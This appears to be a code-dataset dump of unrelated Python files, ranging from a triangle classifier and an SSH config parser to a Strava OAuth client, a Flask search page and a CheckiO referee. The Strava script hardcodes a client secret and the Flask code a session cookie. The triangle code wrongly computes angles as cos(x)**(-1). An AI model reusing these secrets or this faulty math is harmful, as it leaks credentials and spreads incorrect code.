cosZ=((x**2)+(y**2)-(z**2))/(2*x*y)\n\n X=math.degrees((math.cos(cosX))**(-1))\n Y=math.degrees((math.cos(cosY))**(-1))\n Z=math.degrees((math.cos(cosZ))**(-1))\n\n if X < 90:\n if Y < 90:\n if Z < 90:\n kat=\"Ostrokątny\"\n return kat\n \n if X == 90:\n kat=\"Prostokątny\"\n return kat\n elif Y == 90:\n kat=\"Prostokątny\"\n return kat\n elif Z == 90:\n kat=\"Prostokątny\"\n return kat\n\n if X > 90:\n kat=\"Rozwartokątny\"\n return kat\n elif Y > 90:\n kat=\"Rozwartokątny\"\n return kat\n elif Z > 90:\n kat=\"Rozwartokątny\"\n return kat","sub_path":"lista6/trojkat.py","file_name":"trojkat.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"220174760","text":"# -*- coding:utf-8 -*-\n# Copyright (C) 2003-2011 Robey Pointer \n#\n# This file is part of paramiko.\n#\n# Paramiko is free software; you can redistribute it and/or modify it under the\n# terms of the GNU Lesser General Public License as published by the Free\n# Software Foundation; either version 2.1 of the License, or (at your option)\n# any later version.\n#\n# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR\n# A PARTICULAR PURPOSE. 
See the GNU Lesser General Public License for more\n# details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with Paramiko; if not, write to the Free Software Foundation, Inc.,\n# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.\n\n\nimport re\n\n\nclass SSHDConfig(object):\n \"\"\"\n 主要用来解析/etc/ssh/sshd_config配置文件\n \"\"\"\n\n # 匹配规则,空格=空格或者多个空格\n SETTINGS_REGEX = re.compile(r'(\\w+)(?:\\s*=\\s*|\\s+)(.+)')\n\n def __init__(self):\n \"\"\"\n Create a new OpenSSH config object.\n \"\"\"\n self._sshd_config = {}\n\n def parse(self, file_name='/etc/ssh/sshd_config'):\n \"\"\"\n Read an OpenSSH config from the given file object.\n\n :param file_obj: a file-like object to read the config file from\n \"\"\"\n\n with open(file_name, 'r') as file_obj:\n\n for line in file_obj:\n # Strip any leading or trailing whitespace from the line.\n # See https://github.com/paramiko/paramiko/issues/499 for more info.\n line = line.strip()\n\n if not line or line.startswith('#'):\n\n continue\n\n match = re.match(self.SETTINGS_REGEX, line)\n if not match:\n raise Exception(\"Unparsable line %s\" % line)\n key = match.group(1)\n value = match.group(2)\n self._sshd_config[key] = value\n\n\ndef get_ssh_config(file_name):\n\n sshd_config = SSHDConfig()\n sshd_config.parse(file_name=file_name)\n return sshd_config._sshd_config\n\n\n","sub_path":"parse_config/parse_ssh_config.py","file_name":"parse_ssh_config.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19328218","text":"# leetcode 25 hard high freq\n\"\"\"\n重点是:\n1.dummy node\n2.reverse linked list\n3.每次k个部分都用head指向开头,两个指针,最后记得连接,这样才能把各个k部分连接在一起。\n\"\"\"\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def reverseKGroup(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n # dummy.next is always head 永远是当前的头\n dummy = ListNode(0)\n dummy.next = head \n \n head = dummy # 此时dummy已经储存了head的信息,所以为了少用一个变量,让head指向dummy\n while head:\n head = self.reverseNextK(head, k)\n \n return dummy.next\n \n \n def reverseNextK(self, head, k):\n # head -> n1->n2..nk->nk+1\n # =>\n # head ->nk->nk-1....n1->nk+1..\n # return n1\n n1 = head.next\n nk = head # n1, nk就相当于双指针一样,指着k个链表的开头和结尾\n for i in range(k):\n nk = nk.next\n if nk is None:\n return None # 不够k个,结束了\n pre = None\n cur = n1\n nkplus = nk.next\n while cur != nkplus:\n temp = cur.next\n cur.next = pre\n pre = cur\n cur = temp # reverse linked list\n \n # connect\n head.next = nk # 连接是因为要连接k个部分,则每次都有head和nkplus,最初的head正好是dummy node,最后返回dummy.next\n n1.next = nkplus\n \n return n1","sub_path":"LinkedList_and_array/Leetcode/25.Reverse_Nodes_in_k-Group.py","file_name":"25.Reverse_Nodes_in_k-Group.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"254605910","text":"import os\nimport xmlrpc.client\nfrom colorama import Fore\ns = xmlrpc.client.ServerProxy('http://192.168.1.76:8000/mis_archivos')\ncurrentPath = 'home/'\n\nwhile True:\n comando = input(Fore.MAGENTA + ('{}>'.format(currentPath,color='green')))\n argumentos = comando.split(' ')\n\n try:\n if argumentos[0] == 'create':\n print(Fore.LIGHTRED_EX + s.create(currentPath,argumentos[1]))\n elif argumentos[0] == 'read':\n print(Fore.LIGHTBLACK_EX + s.read(currentPath,argumentos[1]))\n elif 
argumentos[0] == 'write':\n if len(argumentos) > 3:\n argumentos[2] = ' '.join(argumentos[2:(len(argumentos))])\n print(Fore.LIGHTRED_EX + s.write(currentPath, argumentos[1], argumentos[2]))\n elif argumentos[0] == 'rename':\n print(Fore.LIGHTRED_EX + s.rename(currentPath,argumentos[1], argumentos[2]))\n elif argumentos[0] == 'rm':\n print(Fore.LIGHTRED_EX + s.remove(currentPath,argumentos[1]))\n elif argumentos[0] == 'mkdir':\n print(Fore.LIGHTRED_EX + s.createdir(currentPath,argumentos[1]))\n elif argumentos[0] == 'rmdir':\n print(Fore.LIGHTRED_EX + s.rmdir(currentPath,argumentos[1]))\n elif argumentos[0] == 'ls':\n print(Fore.LIGHTBLUE_EX + s.ls(currentPath))\n elif argumentos[0] == 'cd':\n currentPath = s.cd(currentPath,argumentos[1])\n elif argumentos[0] == '-h':\n print(Fore.LIGHTBLACK_EX + s.help())\n elif argumentos[0] == 'exit':\n exit(0)\n elif argumentos[0] == 'upload':\n if os.path.isfile(argumentos[1]):\n name = os.path.basename(argumentos[1])\n f = open(argumentos[1], 'rb')\n send = xmlrpc.client.Binary(f.read())\n print(s.upload(currentPath, name, send))\n else:\n print('No se encontó el archivo ' + argumentos[1])\n elif argumentos[0] == 'download':\n name = argumentos[1]\n try:\n if not os.path.exists(currentPath):\n os.makedirs(currentPath)\n with open(currentPath + name, 'wb') as f:\n f.write(s.download(currentPath, name).data)\n print(Fore.LIGHTRED_EX + 'Archivo guardado localmente')\n except (OSError, IOError):\n print(Fore.RED + 'No se encontró el archivo en el servidor')\n\n else:\n print(Fore.RED + 'No existe el comando')\n except (IndexError):\n print(Fore.RED + 'Argumentos faltantes (-h para ver todos los comandos disponibles)')","sub_path":"cliente/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"74503215","text":"\"\"\"\n\n task6_3_starter.py - Using the argparse Module\n\n This exercise is a refactoring of the task6_2.py solution. It\n proposes parsing command-line arguments to determine how many results to display.\n The following command line arguments shall be used:\n\n python task6_3_starter.py -c 5\n\n\t\t or\n\n python task6_3_starter.py --count 5\n\n\n Helpful hints:\n\n 1. Create a function called get_args() that instantiates the argparse\n parser and adds the -c and --count argument. Return the parsed args\n from this function.\n\n 2. Invoke the function, retrieving the parsed command-line arguments from\n the argparse parser.\n\n 3. 
Use the args.count property in a loop to display the most common countries\n\n\n\"\"\"\nimport os\nfrom collections import Counter\n\n\nworking_dir = '../resources'\ncity_data = 'cities15000.txt'\ncountry_info = 'countryInfo.txt'\n\n\ndef read_countries_generator():\n try:\n with open(os.path.join(working_dir, city_data), encoding='utf8') as cities_file:\n for line in cities_file:\n city_record = line.strip().split('\\t')\n country_code = city_record[8]\n yield country_code\n except IOError as e:\n print('Error: {0}'.format(e))\n\n\ndef read_country_names_generator():\n try:\n with open(os.path.join(working_dir, country_info), encoding='utf8') as countries_file:\n for idx, line in enumerate(countries_file):\n if idx > 50:\n country_record = line.strip().split('\\t')\n country_code = country_record[0]\n country_name = country_record[4]\n yield country_code, country_name\n except IOError as e:\n print('Error: {0}'.format(e))\n\n\ncountries_referenced = list(read_countries_generator())\ncountry_names = { code:name for code, name in read_country_names_generator()}\n\n# calculate the country with the most cities over 15000\nmost_common_countries = Counter(countries_referenced).most_common(2)\nmost_common, count = most_common_countries[0]\nsecond_most_common, second_count = most_common_countries[1]\n\nprint('Country with most cities over 15000 population: {0} with {1} cities.'\n .format(country_names[most_common], count))\nprint('Country with second most cities over 15000 population: {0} with {1} cities.'\n .format(country_names[second_most_common], second_count))\n","sub_path":"student_files/ch06_std_lib/task6_3_starter.py","file_name":"task6_3_starter.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372332633","text":"from flask import *\r\nfrom flask_wtf import FlaskForm #基类\r\nfrom wtforms import BooleanField,TextAreaField,StringField,PasswordField,RadioField,SelectField, IntegerField,SubmitField\r\nfrom . import searchclass#,auto_input\r\nfrom . 
import util\r\nfrom flask import session,g\r\nfrom whoosh import analysis\r\nimport calendar\r\nimport numpy as np\r\nimport time\r\nimport cv2\r\nimport requests\r\nhome = Blueprint(\"search_result\",__name__,url_prefix=\"/result\")\r\n\r\n@home.route('/',methods=['GET','POST'])\r\ndef display_result():\r\n s_time = time.time()\r\n if request.method == 'POST' and request.form.get('form_fill') :\r\n # click \"Fill the forms\"\r\n mySearch = searchclass.SearchClass()\r\n real_tags = {}\r\n text = request.form.get('text_input')\r\n if text:\r\n # [parsed_query,real_tags] = g.searcher.QueryParser(text,'info_dictionary_mar8.json')\r\n [parsed_query,real_tags] = mySearch.QueryParser(text,'info_dictionary_mar8.json')\r\n if 'query_term' in session:\r\n # session['query_term'] = util.merge(session['query_term'],parsed_query,session['parsed_query'])\r\n # print(session['query_term'],parsed_query,session['parsed_query'])\r\n session['this_parsed_query'] = parsed_query\r\n query_term = util.merge(session['query_term'],parsed_query,session['all_parsed_query'])\r\n else:\r\n # session['query_term'] = parsed_query\r\n session['this_parsed_query'] = parsed_query\r\n query_term = parsed_query\r\n session['all_parsed_query'] = {}\r\n # session['query_term']['text'] = text\r\n query_term['text'] = text\r\n # session['parsed_query'] = parsed_query\r\n session['real_tags'] = real_tags\r\n # session['js_query_term'] = util.js_query(query_term)\r\n form = dict(request.form)\r\n js_query_term = util.js_query(query_term,form.get(\"img_feedback\",\"\"),form.get(\"Tag_feedback\",\"\"))\r\n mySearch.__close__()\r\n print('query parse time: %f s'%(round(time.time()-s_time,2)))\r\n return render_template('ResultPage.html',all_content={'js_query_term':js_query_term,'result_key':session['result_key'],\r\n 'result_all':session['result_all'],'extra_info':session['extra_info']})\r\n elif request.method == 'POST' and request.form.get('search') :\r\n # click \"Search\"\r\n mySearch = searchclass.SearchClass()\r\n this_query,img_feedback_str, tag_feedback_str= \\\r\n util.get_query_term(dict(request.form),{'shot_id':session['shot_id'],'result_key':session['result_key'],'extra_info':session[\"extra_info\"]})\r\n for key in this_query:\r\n if 'location' in key and type(this_query[key]) != dict:\r\n this_query[key] = list(set(this_query[key]))\r\n session['all_parsed_query'] = util.merge(session['all_parsed_query'],session['this_parsed_query'],session['all_parsed_query'])\r\n # [img_key_list, img_all_list,shot_id_dict,session['extra_info']] = g.searcher.QueryMain(util.add_tags(this_query,session['real_tags']))\r\n [img_key_list, img_all_list,shot_id_dict,session['extra_info']] = mySearch.QueryMain(util.add_tags(this_query,session['real_tags']),limit_num=15)\r\n mySearch.__close__()\r\n\r\n session['query_term'] = this_query\r\n # session[\"query_term\"][\"img_feedback_str\"] = img_feedback_str\r\n # session[\"query_term\"][\"tag_feedback_str\"] = tag_feedback_str\r\n session['query_term']['text'] = request.form.get('text_input')\r\n session['result_key'] = img_key_list\r\n session['result_all'] = img_all_list\r\n session['shot_id'] = shot_id_dict\r\n js_query_term = util.js_query(session['query_term'],img_feedback_str,tag_feedback_str)\r\n # session['js_query_term'] = util.js_query(session['query_term'],img_feedback_str,tag_feedback_str)\r\n print('search time: %f s'%(round(time.time()-s_time,2)))\r\n # print('query term:::')\r\n # print(session['query_term'])\r\n # print(session['js_query_term'])\r\n return 
render_template('ResultPage.html',all_content={'js_query_term':js_query_term,'result_key':session['result_key'],\r\n 'result_all':session['result_all'],'extra_info':session['extra_info']})\r\n # return render_template('ResultPage.html',all_content={'js_query_term':session['js_query_term'],'result_key':session['result_key'],\r\n # 'result_all':session['result_all'],'extra_info':session['extra_info']})\r\n \r\n elif request.method == 'POST' and request.form.get('Submit'):\r\n form = dict(request.form)\r\n result_id = form[\"submit_id\"][0]\r\n print(result_id)\r\n if '.' in result_id:\r\n result_id = result_id.split('.')[0]\r\n url = 'https://vbs.itec.aau.at:9443/submit?item='+result_id\r\n log = requests.get(url=url,\r\n headers={'cookie':'JSESSIONID=node07ggovm6dts531kvtu1p2xhnst1.node0'})\r\n result = log.json()['description']\r\n this_query,img_feedback_str, tag_feedback_str= \\\r\n util.get_query_term(dict(request.form),{'shot_id':session['shot_id'],'result_key':session['result_key'],'extra_info':session[\"extra_info\"]})\r\n js_query_term = util.js_query(session['query_term'],img_feedback_str,tag_feedback_str)\r\n js_query_term[\"submit_id\"] = result_id\r\n js_query_term[\"submit_result\"] = result\r\n return render_template('ResultPage.html',all_content={'js_query_term':js_query_term,'result_key':session['result_key'],\r\n 'result_all':session['result_all'],'extra_info':session['extra_info']})\r\n else:\r\n session['js_query_term'] = util.js_query(session['query_term'])\r\n print(session['js_query_term'])\r\n return render_template('ResultPage.html',all_content={'js_query_term':session['js_query_term'],'result_key':session['result_key'],\r\n 'result_all':session['result_all'],'extra_info':session['extra_info']})","sub_path":"blueprints/ResultPage.py","file_name":"ResultPage.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"645757781","text":"import http.server as _hs\nimport urllib.parse as _uparse\nimport subprocess as _subp\nimport threading as _threading\nimport requests as _rq\nimport os as _os\nimport os.path as _path\nimport configparser as _configp\nimport time as _time\n\n\nthis_old_garmin_id = 29665\nthis_old_garmin_secret='7832770c9dc5dd82b131746a436120470c4d35a2'\nthis_old_garmin_redirect_uri = 'http://localhost:8000'\nbrowser_path = r'\"C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe\"'\n\n\ndef trace(t):\n\tprint('TRACE: {}'.format(t))\n\n\ndef message(t):\n\tprint(t)\n\n\ndef parse_parameters(url):\n\tparsed = _uparse.urlparse(url)\n\treturn _uparse.parse_qs(parsed.query)\t\n\n\n## Do not access while the server is running.\nserver_keeps_running = True\nauthorization_code = ''\n\n\nclass RequestHandler (_hs.BaseHTTPRequestHandler) :\n\tdef do_GET(self):\n\t\tself._generic_response()\n\t\ttrace('received response from authorizer')\n\t\tparams = parse_parameters(self.requestline)\n\t\tif 'code' in params:\n\t\t\tglobal authorization_code\n\t\t\tauthorization_code = params['code'][0]\n\t\t\ttrace('code is {}'.format(authorization_code))\n\t\t\tglobal server_keeps_running\n\t\telse:\n\t\t\ttrace('no code in response')\n\t\tserver_keeps_running = False\n\n\tdef log_request(self, code='-', size='-'):\n\t\tpass\n\n\tdef _generic_response(self):\n\t\tself.send_response(200)\n\t\tself.send_header('Content-type', 'text/html')\n\t\tself.end_headers()\n\t\tself.wfile.write(bytes('

<html><body>This Old Garmin</body></html>
', 'utf-8'))\n\n\ndef run_server():\n server_address = ('', 8000)\n httpd = _hs.HTTPServer(server_address, RequestHandler)\n trace('server is starting...')\n global server_keeps_running\n while server_keeps_running:\n \thttpd.handle_request()\n trace('server has stopped')\n\n\ndef launch_server():\n\tserver_thread = _threading.Thread(group=None, target=run_server)\n\tserver_thread.start()\n\treturn server_thread\n\n\ndef auth_uri():\n\tpage = 'https://www.strava.com/oauth/authorize'\n\tparameters = [\n\t\t('client_id', this_old_garmin_id),\n\t\t('response_type', 'code'),\n\t\t('redirect_uri', this_old_garmin_redirect_uri),\n\t\t('approval_prompt', 'auto'),\n\t\t('scope', 'activity:write')\n\t]\n\n\tparams_assign = ['{}={}'.format(k,v) for (k,v) in parameters]\n\n\treturn page + '?' + '&'.join(params_assign)\n\n\ndef get_authorization_code_request():\n\ttrace('getting authorization code from server')\n\tserver_thread = launch_server();\n\n\t_subp.call('{} {}'.format(browser_path, auth_uri()))\n\n\tserver_thread.join()\n\n\tglobal authorization_code\n\ttrace('got authorization code from server')\n\treturn authorization_code\n\n\ndef get_tokens_request(code):\n\ttrace('get tokens for the first time from the server')\n\tpage = 'https://www.strava.com/oauth/token'\n\tparams = {\n\t\t'client_id': this_old_garmin_id,\n\t\t'client_secret': this_old_garmin_secret,\n\t\t'code': code,\n\t\t'grant_type': 'authorization_code'\n\t}\n\n\tr = _rq.post(page, params=params)\t\n\tj = r.json()\n\n\treturn (\n\t\tj['refresh_token'], \n\t\tj['access_token'],\n\t\tstr(j['expires_at'])\n\t)\n\n\ndef refresh_tokens_request(refresh_token):\n\ttrace('refresh tokens from the server')\n\tpage = 'https://www.strava.com/oauth/token'\n\tparams = {\n\t\t'client_id': this_old_garmin_id,\n\t\t'client_secret': this_old_garmin_secret,\n\t\t'refresh_token': refresh_token,\n\t\t'grant_type': 'refresh_token'\n\t}\n\n\tr = _rq.post(page, params=params)\t\n\tj = r.json()\n\n\treturn (\n\t\tj['refresh_token'], \n\t\tj['access_token'],\n\t\tstr(j['expires_at'])\n\t)\n\n\ndef app_data_filename():\n\thome = _os.getenv('APPDATA')\n\treturn _path.join(home, 'this_old_garmin')\n\n\ndef read_app_data():\n\tapp_data = _configp.ConfigParser()\n\ttry:\n\t\tapp_data.read(app_data_filename())\n\texcept FileNotFoundError:\n\t\ttrace('application data file not found')\n\treturn app_data\n\n\ndef write_app_data(app_data):\n\twith open(app_data_filename(), 'w') as f:\n\t\tapp_data.write(f)\n\n\ndef is_access_token_valid(ac, ex):\n\n\ttry:\n\t\texpires_at_epoch = float(ex)\n\t\tnow_epoch = _time.time()\n\t\ttoo_close = 5 * 60 # five minutes\n\n\t\tif now_epoch + too_close > expires_at_epoch:\n\t\t\treturn False\n\texcept ValueError:\n\t\treturn False\n\n\treturn ac != ''\n\n\ndef is_refresh_token_valid(rf):\n\treturn rf != ''\n\n\ndef is_code_valid(co):\n\treturn co != ''\n\n\ndef update_tokens(section, tokens):\n\tsection['refresh_token'] = tokens[0]\n\tsection['access_token'] = tokens[1]\n\tsection['expires_at'] = tokens[2]\n\n\ndef prepare_access_token(section):\n\taccess_token = section.get('access_token', '')\t\n\texpires_at = section.get('expires_at', '')\t\n\n\tif not is_access_token_valid(access_token, expires_at):\n\t\tget_access_token(section)\n\n\ttrace('access token is {}'.format(section['access_token']))\n\n\ndef get_access_token(section):\n\t# access token is invalid or expired\n\trefresh_token = section.get('refresh_token', '')\n\n\tif is_refresh_token_valid(refresh_token):\n\t\ttokens = 
refresh_tokens_request(refresh_token)\n\t\tupdate_tokens(section, tokens)\n\telse:\n\t\tget_tokens_from_authorization_code(section)\n\n\ndef get_tokens_from_authorization_code(section):\n\t# refresh and access tokens are invalid\n\tcode = section.get('code', '')\n\n\tif not is_code_valid(code):\n\t\tcode = get_authorization_code_request()\n\t\tsection['code'] = code\n\n\ttokens = get_tokens_request(code)\n\n\tupdate_tokens(section, tokens)\n\n\ndef get_section(configp, name):\n\ttry:\n\t\treturn configp[name]\n\texcept KeyError:\n\t\tconfigp.add_section(name)\n\t\treturn configp[name]\n\n\ndef main():\n\tapp_data = read_app_data()\n\n\tauthorization_section = get_section(app_data, 'authorization')\n\n\tprepare_access_token(authorization_section)\n\n\twrite_app_data(app_data)\n\n\t# TODO get data from Garmin unit\n\t# TODO push data to site with access token\n\nif __name__ == \"__main__\": \n\tmain()\n","sub_path":"this_old_garmin.py","file_name":"this_old_garmin.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"457486192","text":"from graph_knn import distancia_euclidiana\n\ndef busca_A(grafo, inicio, fim):\n print(\"BUSCA BEST FIRST\")\n\n vertices = grafo.get_vertices()\n\n pilha = [inicio]\n visitados = [inicio]\n # antecessores = [-1]\n distancia_percorrida = 0\n distancia_caminho = -1\n caminho = []\n while pilha:\n vertice_antecessor = pilha[-1]\n print(\"Pilha:\", pilha, \"Distancia:\", distancia_percorrida)\n\n for aresta in vertices[vertice_antecessor].get_arestas():\n if aresta[0] not in visitados:\n pilha.append(aresta[0])\n distancia_percorrida += aresta[1]\n if aresta[0] == fim:\n print(\"Caminho: \", pilha, \"Distancia:\", distancia_percorrida)\n if not caminho or distancia_percorrida < distancia_caminho or len(pilha) < len(caminho):\n print(\"Novo caminho\\n\")\n caminho = pilha.copy()\n distancia_caminho = distancia_percorrida\n distancia_percorrida -= aresta[1]\n pilha.pop()\n pilha.pop()\n else:\n visitados.append(aresta[0])\n\n break\n\n if aresta == vertices[vertice_antecessor].arestas[-1]:\n distancia_percorrida -= aresta[1]\n pilha.pop()\n\n\n if not caminho:\n print(f\"Não possui caminho de {inicio} até {fim}. 
:(\")\n else:\n print(\"Tem caminho!\")\n print(caminho)\n\n print()\n return caminho\n ","sub_path":"auxs/busca_aux.py","file_name":"busca_aux.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"1671687","text":"from params_proto import Proto, cli_parse\nfrom termcolor import cprint\n\n\n@cli_parse\nclass Args:\n data_path = Proto(\"~/fair/streetlearn/processed-data/manhattan-small\",\n help=\"path to the processed streetlearn dataset\")\n street_view_size = Proto((64, 64), help=\"image size for the dataset\", dtype=tuple)\n street_view_mode = Proto(\"omni-gray\", help=\"OneOf[`omni-gray`, `ombi-rgb`]\")\n\n lng_lat_correction = Proto(0.75, help=\"length correction factor for lattitude.\")\n\n latent_dim = Proto(2, help=\"latent space for the global embedding\")\n\n load_global_metric = \"episodeyang/plan2vec/2019/05-23/streetlearn/manhattan-small/gt-neighbor-success/show-goal\"\n\n\ndef visualize_global_metric(all_images, lng_lat, global_metric):\n \"\"\"assume that embedding function is 2D\"\"\"\n import torch\n\n with torch.no_grad():\n xs = torch.tensor(all_images, dtype=torch.float32)\n cs = global_metric(xs)\n\n print(cs.cpu().numpy())\n\n import matplotlib.pyplot as plt\n\n fig = plt.figure(figsize=(3, 3), dpi=140)\n plt.scatter(*cs.cpu().numpy().T, color=\"#23aaff\", alpha=0.5)\n # plt.xlim(-0.001, 0.001)\n # plt.ylim(-0.001, 0.001)\n plt.show()\n print('done')\n\n\ndef main():\n from termcolor import cprint\n import torch\n import numpy as np\n from ml_logger import logger\n from plan2vec.models.convnets import GlobalMetricConvDeepL2\n\n Args.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n if True: # load local metric\n cprint('loading global metric', \"yellow\", end=\"... \")\n\n global_metric = GlobalMetricConvDeepL2(1, Args.latent_dim).to(Args.device)\n\n # hard code args for experiment\n Args.model = type(global_metric).__name__\n logger.log_params(Args=vars(Args))\n\n logger.load_module(global_metric, Args.load_global_metric)\n # global_metric.eval()\n logger.log_text(str(global_metric), filename=\"models/global_metric.txt\")\n\n cprint('✔done', 'green')\n\n if True: # get rope dataset\n cprint('loading environment dataset', \"yellow\", end=\"... 
\")\n\n # collect sample here\n from streetlearn import StreetLearnDataset\n from os.path import expanduser\n\n streetlearn = StreetLearnDataset(expanduser(Args.data_path), Args.street_view_size, Args.street_view_mode)\n streetlearn.select_all()\n Args.streetlearn_bbox = streetlearn.bbox\n\n cprint('✔done', 'green')\n\n all_images = streetlearn.images[:, None, ...].astype(np.float32) / 255\n all_states = streetlearn.lng_lat\n\n visualize_global_metric(all_images, all_states, global_metric.encode)\n\n\nif __name__ == \"__main__\":\n from plan2vec_experiments import RUN, instr\n from ml_logger import logger\n\n if not logger.prefix:\n logger.configure(RUN.server, register_experiment=False)\n\n exp_prefix = \"episodeyang/plan2vec/2019/05-23/streetlearn/manhattan-tiny/gt-neighbor-success/2-agents\"\n with logger.PrefixContext(exp_prefix):\n weight_paths = sorted(logger.glob(\"**/global_metric*.pkl\"), reverse=True)\n\n cprint(f\"There are {len(weight_paths)} checkpoints.\", \"green\")\n for path in weight_paths:\n Args.load_global_metric = f\"/{exp_prefix}/{path}\"\n main()\n","sub_path":"plan2vec_experiments/goal-mass-image/analysis/visualize_global_embedding.py","file_name":"visualize_global_embedding.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403829975","text":"import plotly.graph_objs as go\nfrom plotly import tools\n\nfrom src.components.dataPokemon import dfPokemon\nfrom src.components.support import legendDict\n\n\nrowcolhist = {\n 'Generation' : {'row' : 3, 'col' : 2},\n 'Legendary' : {'row' : 1, 'col' : 2}\n}\n\ndef callbackupdatehistogram(x, hue, std):\n std = int(std)\n if(hue == 'All') :\n return dict(\n data=[\n go.Histogram(\n x=dfPokemon[\n (dfPokemon[x] >= (dfPokemon[x].mean() - (std * dfPokemon[x].std())))\n & (dfPokemon[x] <= (dfPokemon[x].mean() + (std * dfPokemon[x].std())))\n ][x],\n name='Normal',\n marker=dict(\n color='green'\n )\n ),\n go.Histogram(\n x=dfPokemon[\n (dfPokemon[x] < (dfPokemon[x].mean() - (std * dfPokemon[x].std())))\n | (dfPokemon[x] > (dfPokemon[x].mean() + (std * dfPokemon[x].std())))\n ][x],\n name='Not Normal',\n marker=dict(\n color='red'\n )\n )\n ],\n layout=go.Layout(\n title='Histogram {} Stats Pokemon'.format(x),\n xaxis=dict(title=x),\n yaxis=dict(title='Count'),\n height=450, width=1000\n )\n )\n subtitles = []\n for val in dfPokemon[hue].unique() :\n dfSub = dfPokemon[dfPokemon[hue] == val]\n outlierCount = len(dfSub[\n (dfSub[x] < (dfSub[x].mean() - (std * dfSub[x].std())))\n | (dfSub[x] > (dfSub[x].mean() + (std * dfSub[x].std())))\n ])\n subtitles.append(legendDict[hue][val] + \" ({}% outlier)\".format(round(outlierCount/len(dfSub) * 100, 2)))\n\n fig = tools.make_subplots(\n rows=rowcolhist[hue]['row'], cols=rowcolhist[hue]['col'],\n subplot_titles=subtitles\n )\n uniqueData = dfPokemon[hue].unique().reshape(rowcolhist[hue]['row'],rowcolhist[hue]['col'])\n index=1\n for r in range(1, rowcolhist[hue]['row']+1) :\n for c in range(1, rowcolhist[hue]['col']+1) :\n dfSub = dfPokemon[dfPokemon[hue] == uniqueData[r-1,c-1]]\n fig.append_trace(\n go.Histogram(\n x=dfSub[\n (dfSub[x] >= (dfSub[x].mean() - (std * dfSub[x].std())))\n & (dfSub[x] <= (dfSub[x].mean() + (std * dfSub[x].std())))\n ][x],\n name='Normal {} {}'.format(hue,uniqueData[r-1,c-1]),\n marker=dict(\n color='green'\n )\n ),r,c\n )\n fig.append_trace(\n go.Histogram(\n x=dfSub[\n (dfSub[x] < (dfSub[x].mean() - (std * dfSub[x].std())))\n | (dfSub[x] > (dfSub[x].mean() + (std 
* dfSub[x].std())))\n ][x],\n name='Not Normal {} {}'.format(hue, uniqueData[r-1,c-1]),\n marker=dict(\n color='red'\n )\n ),r,c\n )\n fig['layout']['xaxis'+str(index)].update(title=x.capitalize())\n fig['layout']['yaxis'+str(index)].update(title='Count')\n index += 1\n\n if(hue == 'Generation') :\n fig['layout'].update(height=700, width=1000,\n title='Histogram {} Stats Pokemon'.format(x))\n else :\n fig['layout'].update(height=450, width=1000,\n title='Histogram {} Stats Pokemon'.format(x))\n\n return fig","sub_path":"src/components/tab5/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"376160265","text":"def checker(data, user_result):\n try:\n solver = user_result\n stripe = eval(solver)\n if any((type(stripe) != str,\n len(stripe) != sum(len(ribbon) for ribbon in data),\n any(a not in '01' for a in stripe),\n any(a == b for a, b in zip(stripe, stripe[1:])))):\n return False\n cuts = sum(a == b for ribbon in data for a, b in zip(ribbon, ribbon[1:]))\n commutator = [[False] * len(ribbon) for ribbon in data]\n data = ['0' * len(ribbon) for ribbon in data]\n res = eval(solver)\n if '1' in res:\n return False\n targets = []\n for i, ribbon in enumerate(data):\n ribbon = list(ribbon)\n for j in range(len(ribbon)):\n ribbon[j] = '1'\n data[i] = ''.join(ribbon)\n res = eval(solver)\n if res.count('1') != 1:\n return False\n k = res.index('1')\n targets.append(k)\n commutator[i][j], ribbon[j] = k, '0'\n data[i] = ''.join(ribbon)\n targets.sort()\n if targets != list(range(len(stripe))):\n return False\n for i, switches in enumerate(commutator):\n for a, b in zip(switches, switches[1:]):\n cuts -= abs(a - b) != 1\n return not cuts\n except Exception:\n return False\n\nfrom checkio.signals import ON_CONNECT\nfrom checkio import api\nfrom checkio.referees.io import CheckiOReferee\nfrom checkio.referees.cover_codes import unwrap_args\n\nfrom tests import TESTS\n\n\napi.add_listener(\n ON_CONNECT,\n CheckiOReferee(\n tests=TESTS,\n checker=checker,\n function_name='checkio'\n ).on_ready)\n","sub_path":"verification/referee.py","file_name":"referee.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"248543037","text":"# -*- coding: utf-8 -*-\nimport pytest\nfrom .utils import versioned_reverse as reverse\n\n\n@pytest.mark.django_db\ndef test_list_endpoint_delete(api_client, user, event):\n api_client.force_authenticate(user)\n\n response = api_client.delete(reverse('event-list'), format='json')\n assert response.status_code == 